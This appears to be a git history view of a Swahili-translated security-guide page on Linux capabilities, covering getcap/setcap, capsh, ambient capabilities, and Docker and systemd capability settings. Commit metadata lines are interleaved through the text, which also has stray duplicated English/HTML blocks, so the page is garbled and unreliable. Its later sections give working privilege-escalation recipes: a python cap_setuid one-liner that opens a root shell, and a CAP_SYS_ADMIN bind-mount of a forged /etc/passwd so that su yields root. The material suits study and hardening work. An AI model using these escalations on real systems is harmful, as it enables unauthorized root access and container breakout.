											2024-02-11 02:13:58 +00:00
+								## Uwezo wa Mchakato na Programu
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Uwezo wa Mchakato
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kuona uwezo wa mchakato fulani, tumia faili ya **status** katika saraka ya /proc. Kwa kuwa inatoa maelezo zaidi, hebu tuweke kikomo kwenye habari zinazohusiana na uwezo wa Linux.\
 								Tafadhali kumbuka kuwa kwa habari za uwezo wa mchakato zinahifadhiwa kwa kila mchakato, kwa programu katika mfumo wa faili inahifadhiwa kwa sifa zilizopanuliwa.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kupata uwezo uliowekwa katika /usr/include/linux/capability.h
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kupata uwezo wa mchakato wa sasa kwa kutumia `cat /proc/self/status` au kwa kufanya `capsh --print`, na wa watumiaji wengine katika `/proc/<pid>/status`
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
+								```bash
 								cat /proc/1234/status | grep Cap
 								cat /proc/$$/status | grep Cap #This will print the capabilities of the current process
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Amri hii inapaswa kurudisha mistari 5 kwenye mifumo mingi.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* CapInh = Uwezo uliorithiwa
 								* CapPrm = Uwezo ulioruhusiwa
 								* CapEff = Uwezo halisi
 								* CapBnd = Seti ya mipaka
 								* CapAmb = Seti ya uwezo wa mazingira
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
+								```bash
 								#These are the typical capabilities of a root owned process (all)
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
+								CapInh: 0000000000000000
 								CapPrm: 0000003fffffffff
 								CapEff: 0000003fffffffff
 								CapBnd: 0000003fffffffff
 								CapAmb: 0000000000000000
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Linux Uwezo wa Kuongeza Uwezo
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa kutumia kifaa cha capsh, tunaweza kubadilisha nambari hizi za hexadecimali kuwa majina ya uwezo.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
+								```bash
 								capsh --decode=0000003fffffffff
 x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hebu angalia sasa **uwezo** unaotumiwa na `ping`:
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
+								```bash
 								cat /proc/9491/status | grep Cap
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
+								CapInh:    0000000000000000
 								CapPrm:    0000000000003000
 								CapEff:    0000000000000000
 								CapBnd:    0000003fffffffff
 								CapAmb:    0000000000000000
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
 								capsh --decode=0000000000003000
 x0000000000003000=cap_net_admin,cap_net_raw
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ingawa hiyo inafanya kazi, kuna njia nyingine rahisi zaidi. Ili kuona uwezo wa mchakato unaofanya kazi, tumia tu zana ya **getpcaps** ikifuatiwa na kitambulisho cha mchakato (PID). Unaweza pia kutoa orodha ya vitambulisho vya mchakato.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
+								```bash
 								getpcaps 1234
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hebu angalia hapa uwezo wa `tcpdump` baada ya kumpa faili ya binary uwezo wa kutosha (`cap_net_admin` na `cap_net_raw`) ili kusikiliza mtandao (_tcpdump inaendeshwa katika mchakato 9562_):
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
+								#The following command give tcpdump the needed capabilities to sniff traffic
 								$ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
+								$ getpcaps 9562
 								Capabilities for `9562': = cap_net_admin,cap_net_raw+ep
 								$ cat /proc/9562/status | grep Cap
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
+								CapInh:    0000000000000000
 								CapPrm:    0000000000003000
 								CapEff:    0000000000003000
 								CapBnd:    0000003fffffffff
 								CapAmb:    0000000000000000
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
 								$ capsh --decode=0000000000003000
 x0000000000003000=cap_net_admin,cap_net_raw
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kama unavyoona uwezo uliotolewa unalingana na matokeo ya njia 2 za kupata uwezo wa faili.\
 								Zana ya _getpcaps_ hutumia wito wa mfumo wa **capget()** kuuliza uwezo uliopo kwa mchakato fulani. Wito huu wa mfumo unahitaji tu kutoa PID ili kupata habari zaidi.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:01:22 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Uwezo wa Faili za Kutekelezwa
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Faili za kutekelezwa zinaweza kuwa na uwezo ambao unaweza kutumiwa wakati wa utekelezaji. Kwa mfano, ni kawaida sana kupata faili ya `ping` na uwezo wa `cap_net_raw`:
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								```bash
 								getcap /usr/bin/ping
 								/usr/bin/ping = cap_net_raw+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza **kutafuta faili za binary zenye uwezo** kwa kutumia:
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kupunguza uwezo kwa kutumia capsh
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa tunapunguza uwezo wa CAP\_NET\_RAW kwa _ping_, basi zana ya ping haipaswi tena kufanya kazi.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
+								```bash
 								capsh --drop=cap_net_raw --print -- -c "tcpdump"
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Isipokuwa matokeo ya _capsh_ yenyewe, amri ya _tcpdump_ yenyewe pia inapaswa kutoa kosa.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								> /bin/bash: /usr/sbin/tcpdump: Operesheni haikuruhusiwa
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 17:33:06 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kosa linaonyesha wazi kuwa amri ya ping haijiruhusu kufungua soketi ya ICMP. Sasa tunajua kwa uhakika kuwa hii inafanya kazi kama ilivyotarajiwa.
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Ondoa Uwezo
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuondoa uwezo wa faili ya binary na
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
+								```bash
 								setcap -r </path/to/binary>
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uwezo wa Mtumiaji
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Inaonekana **niwezekana pia kumtumia mtumiaji uwezo**. Hii inamaanisha kwamba kila mchakato uliofanywa na mtumiaji utaweza kutumia uwezo wa mtumiaji.\
 								Kulingana na [hii](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [hii](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html), na [hii](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user), inahitajika kusanidi faili kadhaa ili kumpa mtumiaji uwezo fulani, lakini faili inayoweka uwezo kwa kila mtumiaji itakuwa `/etc/security/capability.conf`.\
 								Mfano wa faili:
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
+								```bash
 								# Simple
 								cap_sys_ptrace               developer
 								cap_net_raw                  user1
 								# Multiple capablities
 								cap_net_admin,cap_net_raw    jrnetadmin
 								# Identical, but with numeric values
 ,13                        jrnetadmin
 								# Combining names and numerics
 								cap_sys_admin,22,25          jrsysadmin
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uwezo wa Mazingira
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa kuchapisha programu ifuatayo, ni **inawezekana kuzindua kikao cha bash ndani ya mazingira yanayotoa uwezo**.
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
 								{% code title="ambient.c" %}
 								```c
 								/*
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* Test program for the ambient capabilities
 								*
 								* compile using:
 								* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
 								* Set effective, inherited and permitted capabilities to the compiled binary
 								* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
 								*
 								* To get a shell with additional caps that can be inherited do:
 								*
 								* ./ambient /bin/bash
 								*/
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
 								#include <stdlib.h>
 								#include <stdio.h>
 								#include <string.h>
 								#include <errno.h>
 								#include <sys/prctl.h>
 								#include <linux/capability.h>
 								#include <cap-ng.h>
 								static void set_ambient_cap(int cap) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								int rc;
 								capng_get_caps_process();
 								rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap);
 								if (rc) {
 								printf("Cannot add inheritable cap\n");
 								exit(2);
 								}
 								capng_apply(CAPNG_SELECT_CAPS);
 								/* Note the two 0s at the end. Kernel checks for these */
 								if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) {
 								perror("Cannot set cap");
 								exit(1);
 								}
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								}
 								void usage(const char * me) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								printf("Usage: %s [-c caps] new-program new-args\n", me);
 								exit(1);
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								}
 								int default_caplist[] = {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								CAP_NET_RAW,
 								CAP_NET_ADMIN,
 								CAP_SYS_NICE,
 								-1
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								};
 								int * get_caplist(const char * arg) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								int i = 1;
 								int * list = NULL;
 								char * dup = strdup(arg), * tok;
 								for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) {
 								list = realloc(list, (i + 1) * sizeof(int));
 								if (!list) {
 								perror("out of memory");
 								exit(1);
 								}
 								list[i - 1] = atoi(tok);
 								list[i] = -1;
 								i++;
 								}
 								return list;
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								}
 								int main(int argc, char ** argv) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								int rc, i, gotcaps = 0;
 								int * caplist = NULL;
 								int index = 1; // argv index for cmd to start
 								if (argc < 2)
 								usage(argv[0]);
 								if (strcmp(argv[1], "-c") == 0) {
 								if (argc <= 3) {
 								usage(argv[0]);
 								}
 								caplist = get_caplist(argv[2]);
 								index = 3;
 								}
 								if (!caplist) {
 								caplist = (int * ) default_caplist;
 								}
 								for (i = 0; caplist[i] != -1; i++) {
 								printf("adding %d to ambient list\n", caplist[i]);
 								set_ambient_cap(caplist[i]);
 								}
 								printf("Ambient forking shell\n");
 								if (execv(argv[index], argv + index))
 								perror("Cannot exec");
 								return 0;
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								}
 								```
 								{% endcode %}
 								```bash
 								gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
 								sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
 								./ambient /bin/bash
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ndani ya **bash inayotekelezwa na faili ya binary ya mazingira iliyoundwa**, niwezekanavyo kuona **uwezo mpya** (mtumiaji wa kawaida hatakuwa na uwezo wowote katika sehemu ya "sasa").
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								```bash
 								capsh --print
 								Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
 								```
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+								{% hint style="danger" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza **kuongeza uwezo tu ambao upo** katika seti zote mbili, yaani seti ya kuruhusiwa na seti ya kurithiwa.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
+								{% endhint %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Programu zenye uwezo wa uwezo/Programu zenye uwezo mdogo
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Programu zenye uwezo wa uwezo hazitatumia uwezo mpya** uliotolewa na mazingira, hata hivyo **programu zenye uwezo mdogo zitatumia** uwezo huo kwani hazitakataa. Hii inafanya programu zenye uwezo mdogo kuwa hatarini ndani ya mazingira maalum yanayotoa uwezo kwa programu.
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uwezo wa Huduma
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa chaguo-msingi, **huduma inayotumia akaunti ya root itapewa uwezo wote**, na kwa baadhi ya hali hii inaweza kuwa hatari.\
 								Kwa hiyo, **faili ya usanidi wa huduma** inaruhusu **kutaja** **uwezo** unayotaka huduma hiyo kuwa nayo, **na** **mtumiaji** ambaye anapaswa kutekeleza huduma hiyo ili kuepuka kuendesha huduma na mamlaka zisizo za lazima.
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
+								```bash
 								[Service]
 								User=bob
 								AmbientCapabilities=CAP_NET_BIND_SERVICE
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								## Uwezo katika Kontena za Docker
-												GitBook: [master] one page modified
											
										
										
											2021-01-06 18:21:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa chaguo-msingi, Docker inaweka uwezo kadhaa kwa kontena. Ni rahisi sana kuangalia uwezo huu kwa kukimbia:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```bash
 								docker run --rm -it  r.j3ss.co/amicontained bash
 								Capabilities:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
 								# Add a capabilities
 								docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash
 								# Add all capabilities
 								docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
 								# Remove all and add only one
 								docker run --rm -it  --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
 								```
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
+								<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.
-												GitBook: [#3622] No subject

											
										
										
											2022-10-25 15:56:49 +00:00
 								{% embed url="https://www.rootedcon.com/" %}
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## Privesc/Container Escape
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 16:07:19 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Uwezo ni muhimu wakati unapotaka **kuzuia michakato yako mwenyewe baada ya kufanya shughuli za kipekee** (kwa mfano, baada ya kuanzisha chroot na kufunga soketi). Walakini, wanaweza kutumiwa vibaya kwa kusambaza amri au hoja zenye nia mbaya ambazo kisha zinatekelezwa kama mtumiaji mkuu.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kulazimisha uwezo kwa programu kwa kutumia `setcap`, na kuuliza haya kwa kutumia `getcap`:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
+								```bash
 								#Set Capability
 								setcap cap_net_raw+ep /sbin/ping
 								#Get Capability
 								getcap /sbin/ping
 								/sbin/ping = cap_net_raw+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								`+ep` inamaanisha unaweka uwezo ("-" ingeondoa) kama Ufanisi na Kuruhusiwa.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kutambua programu katika mfumo au folda yenye uwezo:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Mfano wa Utekaji
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika mfano ufuatao, faili ya binary `/usr/bin/python2.6` imeonekana kuwa na udhaifu wa kusababisha ongezeko la mamlaka:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
+								```bash
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
+								setcap cap_setuid+ep /usr/bin/python2.7
 								/usr/bin/python2.7 = cap_setuid+ep
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
 								#Exploit
-												GitBook: [master] one page modified
											
										
										
											2020-08-27 18:01:56 +00:00
+								/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Uwezo** unaohitajika na `tcpdump` ili **kuruhusu mtumiaji yeyote kusikiliza pakiti**:
 								```markdown
 								To allow any user to sniff packets using `tcpdump`, the following capabilities need to be set:
 . `CAP_NET_RAW`: This capability allows the user to create raw sockets, which is necessary for packet sniffing.
 								To set these capabilities, you can use the `setcap` command as follows:
 								```bash
 								sudo setcap cap_net_raw=eip /usr/sbin/tcpdump
 								```
 								This command sets the `CAP_NET_RAW` capability for the `tcpdump` binary located at `/usr/sbin/tcpdump`. With this capability set, any user will be able to run `tcpdump` and sniff packets.
 								```
 								```html
 								<h2>Uwezo</h2> unaohitajika na <code>tcpdump</code> ili <strong>kuruhusu mtumiaji yeyote kusikiliza pakiti</strong>:
 								<pre>
 								Ili kuruhusu mtumiaji yeyote kusikiliza pakiti kwa kutumia <code>tcpdump</code>, uwezo ufuatao unahitajika kuwekwa:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. <code>CAP_NET_RAW</code>: Uwezo huu unaruhusu mtumiaji kuunda soketi za asili, ambayo ni muhimu kwa ajili ya kusikiliza pakiti.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ili kuweka uwezo huu, unaweza kutumia amri ya <code>setcap</code> kama ifuatavyo:
 								<code>sudo setcap cap_net_raw=eip /usr/sbin/tcpdump</code>
 								Amri hii inaweka uwezo wa <code>CAP_NET_RAW</code> kwa faili ya <code>tcpdump</code> iliyopo kwenye njia ya <code>/usr/sbin/tcpdump</code>. Kwa kuweka uwezo huu, mtumiaji yeyote ataweza kutumia <code>tcpdump</code> na kusikiliza pakiti.
 								</pre>
 								```
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
+								```bash
 								setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
 								getcap /usr/sbin/tcpdump
 								/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Kesi maalum ya uwezo "mtupu"
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[Kutoka kwenye nyaraka](https://man7.org/linux/man-pages/man7/capabilities.7.html): Tafadhali kumbuka kuwa unaweza kumwezesha uwezo mtupu kwenye faili ya programu, na hivyo niwezekana kuunda programu ya set-user-ID-root ambayo inabadilisha set-user-ID ya mchakato unaoendesha programu kuwa 0, lakini haipati uwezo wowote kwa mchakato huo. Au, kwa maneno rahisi, ikiwa una faili ya binary ambayo:
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. Haiomilikiwi na root
 . Haina alama za `SUID`/`SGID` zilizowekwa
 . Ina uwezo mtupu (kwa mfano: `getcap myelf` inarudi `myelf =ep`)
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								basil **binary hiyo itaendeshwa kama root**.
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-27 15:17:33 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_ADMIN
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** ni uwezo wenye nguvu sana wa Linux, mara nyingi unalinganishwa na kiwango cha karibu-cha-root kutokana na **uwezo wake mkubwa wa utawala**, kama vile kufunga vifaa au kubadilisha vipengele vya kernel. Ingawa ni muhimu kwa kontena zinazosimulisha mifumo nzima, **`CAP_SYS_ADMIN` ina changamoto kubwa za usalama**, hasa katika mazingira ya kontena, kutokana na uwezekano wake wa kuongeza uwezo na kuhatarisha usalama wa mfumo. Kwa hiyo, matumizi yake yanahitaji tathmini kali ya usalama na usimamizi wa tahadhari, na upendeleo mkubwa wa kuondoa uwezo huu katika kontena maalum ya programu ili kuzingatia **kanuni ya uwezo mdogo** na kupunguza eneo la shambulio.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/usr/bin/python2.7 = cap_sys_admin+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa kutumia python unaweza kufunga faili iliyobadilishwa ya _passwd_ juu ya faili halisi ya _passwd_:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								cp /etc/passwd ./ #Create a copy of the passwd file
 								openssl passwd -1 -salt abc password #Get hash of "password"
 								vim ./passwd #Change roots passwords of the fake passwd file
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Na hatimaye **funga** faili iliyobadilishwa ya `passwd` kwenye `/etc/passwd`:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```python
 								from ctypes import *
 								libc = CDLL("libc.so.6")
 								libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
 								MS_BIND = 4096
 								source = b"/path/to/fake/passwd"
 								target = b"/etc/passwd"
 								filesystemtype = b"none"
 								options = b"rw"
 								mountflags = MS_BIND
 								libc.mount(source, target, filesystemtype, mountflags, options)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Na utaweza **`su` kama root** kwa kutumia nenosiri "password".
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira (Docker breakout)**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya Docker kwa kutumia:
-												GitBook: No commit message

											
										
										
											2021-10-10 10:07:48 +00:00
+								```
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								capsh --print
 								Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
 								Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
 								Securebits: 00/0x0/1'b0
-												Translated to Swahili

											
										
										
